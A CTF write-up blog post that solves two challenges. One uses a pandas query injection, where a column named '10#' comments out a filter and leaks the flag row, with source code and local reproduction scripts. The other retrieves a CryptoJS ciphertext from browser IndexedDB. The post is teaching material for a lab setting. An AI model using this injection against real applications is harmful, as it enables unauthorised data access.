Challenges:
1. Rnd For Data Science
2. Butterfly
Rnd For Data Science
Vulnerability: Injection into a pandas query expression allows bypassing the filtering restriction
This challenge included two files. Together they take column names and a delimiter from the user and create a CSV file from them.
The server uses the column names as the table headers and fills ten rows with random numbers.
After that, it appends another row (the 11th row) that holds the marker string FLAG in the second column and the actual flag in the third.
    def index():
        delimiter = request.form['delimiter']
        if len(delimiter) > 1:
            return 'ERROR'
        num_columns = int(request.form['numColumns'])
        if num_columns > 10:
            return 'ERROR'
        headers = ['id'] + [request.form["columnName" + str(i)] for i in range(num_columns)]
        forb_list = ['and', 'or', 'not']
        for header in headers:
            if len(header) > 120:
                return 'ERROR'
            for c in '\'"!@':
                if c in header:
                    return 'ERROR'
            for forb_word in forb_list:
                if forb_word in header:
                    return 'ERROR'
        csv_file = delimiter.join(headers)
        for i in range(10):
            row = [str(i)] + [str(rnd.randint(0, 100)) for _ in range(num_columns)]
            csv_file += '\n' + delimiter.join(row)
        row = [str('NaN')] + ['FLAG'] + [flag] + [str(0) for _ in range(num_columns)]
        csv_file += '\n' + delimiter.join(row[:len(headers)])
        return csv_file
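To see which header names survive these checks, the validation loop can be condensed into a small predicate. This is only a sketch for local experimentation: the name header_allowed and the sample inputs are hypothetical and not part of the challenge source.

```python
FORBIDDEN_CHARS = '\'"!@'
FORBIDDEN_WORDS = ['and', 'or', 'not']


def header_allowed(header: str) -> bool:
    """Mirror the per-header checks from index() (hypothetical helper name)."""
    if len(header) > 120:
        return False
    if any(c in header for c in FORBIDDEN_CHARS):
        return False
    # Substring match: 'order' is rejected because it contains 'or'.
    if any(word in header for word in FORBIDDEN_WORDS):
        return False
    return True


if __name__ == "__main__":
    for name in ['col1', '10#', 'order', 'a != b']:
        print(repr(name), header_allowed(name))
```

Digits and the # character are not on the blocklist, so a name such as 10# is accepted.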
The main app forwards the form data to this internal service, reads the returned table with pandas, filters it, and turns the result into a CSV file.
    @app.route("/generate", methods=['POST'])
    def generate():
        data = request.form
        delimiter_const = 'delimiter'
        r = requests.post('http://127.0.0.1:5001', data=data)
        if r.text == 'ERROR':
            return 'ERROR'
        csv = StringIO(r.text)
        df = pd.read_csv(csv)
        # Filter out secrets
        first = list(df.columns.values)[1]
        df = df.query(f'{first} != "FLAG"')
        string_df = StringIO(df.to_csv(index=False, sep=data[delimiter_const]))
        bytes_df = BytesIO()
        bytes_df.write(string_df.getvalue().encode())
        bytes_df.seek(0)
We can see that the server takes the name of the second column:
    first = list(df.columns.values)[1]
It then interpolates that name, unescaped, into a query that keeps only the rows where the value in the second column does not equal 'FLAG':
    df = df.query(f'{first} != "FLAG"')
Let's debug it and run it locally.
After entering two columns named "col1" and "col2", we receive this table. As we can see, the flag was not included in this table.
By debugging the code, we can see that before the filter, the table includes the flag (SecretFlag), and after the filter it is not included.
So we need to find a way to alter the table structure or the query using one of our inputs.
Just as with SQL injection, we can inject a comment character (#) into the pandas query, and everything that comes after it will be ignored.
When the query is just a number, it returns the row with that index.
So if we name our first column "10#", the query will look like this:
    df = df.query('10# != "FLAG"')
and be interpreted as df.query('10'), which returns row 10, the row that contains the flag.
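The comment behaviour can be checked without pandas. pandas parses query strings with Python's own tokenizer and ast module, so a plain Python parse is a reasonable stand-in here, although it is not the exact pandas code path. The column name is the one from this write-up; the variable names are only illustrative.

```python
import ast

column_name = '10#'
# Same f-string shape as the server uses to build the query.
expression = f'{column_name} != "FLAG"'

# Parse as a single expression; everything after '#' is a comment.
tree = ast.parse(expression, mode='eval')
value = ast.literal_eval(expression)

print(expression)           # 10# != "FLAG"
print(type(tree.body).__name__)
print(value)                # 10
```

Only the constant 10 is left in the parsed expression; the comparison with "FLAG" never reaches the evaluator.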
After the filter step, the query returns a table that lists the column names and values of row number 10.
And the CSV file will contain the flag.
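A minimal local reproduction, assuming pandas is installed and behaves like the version used in the challenge. The flag value SecretFlag and the second column name are placeholders, and the random cells are replaced by fixed numbers to keep the sketch short.

```python
from io import StringIO

import pandas as pd

# Build the same table shape the internal service returns (placeholder values).
headers = ['id', '10#', 'col2']
rows = [[str(i), str(i * 3), str(i * 7)] for i in range(10)]
rows.append(['NaN', 'FLAG', 'SecretFlag'])   # the 11th row, index label 10
csv_text = '\n'.join(','.join(r) for r in [headers] + rows)

df = pd.read_csv(StringIO(csv_text))
first = list(df.columns.values)[1]           # the injected name '10#'

# Same call as the server: the expression becomes '10# != "FLAG"'.
result = df.query(f'{first} != "FLAG"')
leaked_csv = result.to_csv(index=False, sep=',')

print(result)
print(leaked_csv)
```

With an ordinary column name such as col1, the same query drops the FLAG row instead of returning it.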
Butterfly
We have access to a web app:
I did not see any interesting functionality or requests, so I checked the source code and the browser's storage.
The LocalStorage and SessionStorage contained a key and this string: {"code":"CryptoJS.AES.decrypt(CIPHERTEXT, KEY).toString(CryptoJS.enc.Utf8)"}
I assumed that the key should be in the KEY position, but where is the ciphertext?
Looking at the source code, I saw a large block of obfuscated JavaScript. I ran it through an online deobfuscator and beautifier, and this was part of the deobfuscated code:
I tried to work out what the ciphertext might be: perhaps part of the 'enc' array, or the full string obtained by joining its elements.
However, after checking online what the ciphertext should look like, this seemed unlikely because of its length, structure and character set.
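For reference, when CryptoJS AES is used with a string passphrase, the ciphertext string is Base64 in OpenSSL's salted format: the decoded bytes start with the 8-byte marker Salted__, followed by an 8-byte salt and the AES blocks. A rough shape check along these lines can rule candidates in or out. It assumes the passphrase mode applies to this challenge, and the function name and sample strings are made up for illustration.

```python
import base64
import binascii


def looks_like_cryptojs_ciphertext(candidate: str) -> bool:
    """Heuristic only: Base64 that decodes to 'Salted__' + salt + whole AES blocks."""
    try:
        raw = base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return False
    if not raw.startswith(b'Salted__'):
        return False
    body = raw[16:]  # skip the 8-byte marker and the 8-byte salt
    return len(body) > 0 and len(body) % 16 == 0


if __name__ == "__main__":
    # Synthetic sample with the right shape (not a real ciphertext).
    sample = base64.b64encode(b'Salted__' + bytes(8) + bytes(32)).decode()
    print(sample[:10])                                           # U2FsdGVkX1
    print(looks_like_cryptojs_ciphertext(sample))                # True
    print(looks_like_cryptojs_ciphertext('not base64 at all!'))  # False
```

A candidate that fails this check may still be ciphertext in another encoding, so a negative result is a hint rather than proof.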
Assuming that the ciphertext had been altered, I continued to explore other interesting parts of the obfuscated code.
Some of them were the strings "transaction", "readwrite" and "target.result". I googled them together to see what they relate to and learned that they belong to IndexedDB.
IndexedDB is a NoSQL database provided by modern browsers. It stores data on the client side, on the user's local system. To retrieve data from it, the user needs to use JavaScript.
I asked one of the LLMs how to retrieve data from IndexedDB. It gave me a script that needed a small modification: updating the database name and the object store name, which were "strangeStorage" and "FLAG".
I retrieved the ciphertext from the DB, and decrypted it.
Thanks for reading,
Orel 🌑
I knew you would solve something! That was one really tough CTF. I enjoyed reading your solutions. Not sure I could have coded to the level needed for solving the first one.
Your second challenge is really interesting, and I have learnt something new about the existence of IndexedDB and how it is used by modern browsers. Also, your tenacity in identifying the ciphertext is admirable! I will look for challenges where I can practice this particular technique.
Thank you!🤓